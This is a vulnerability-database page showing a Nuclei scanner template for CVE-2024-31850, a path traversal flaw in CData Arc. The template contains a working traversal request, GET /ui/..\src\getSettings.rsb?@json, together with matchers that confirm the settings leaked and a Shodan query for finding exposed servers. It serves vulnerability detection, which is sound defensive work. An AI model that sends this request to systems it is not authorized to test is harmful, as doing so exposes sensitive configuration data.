Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-31850
HistoryMay 08, 2024 - 6:17 a.m.

CData Arc < 23.4.8839 - Path Traversal

2024-05-0806:17:11
ProjectDiscovery
github.com
12
cve
cdata
lfi
java
jetty
path traversal
remote attacker
security vulnerability
access control
information disclosure

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.013

Percentile

85.7%

A path traversal vulnerability exists in the Java version of CData Arc &lt; 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
id: CVE-2024-31850

info:
  name: CData Arc < 23.4.8839 - Path Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31850
    - https://github.com/Stuub/CVE-2024-31848-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-31850
    cwe-id: CWE-22
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Arc\""
  tags: cve,cve2024,cdata,lfi
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - '<title>CData Arc'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008bbf300b0ea549282dc1258f3c481521e094057630ded471600235926cfb8aad022043e0add2cc98eeefeaed68b619c6ec62bd46e6d640ae65e66f49a5431c5fde93:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.013

Percentile

85.7%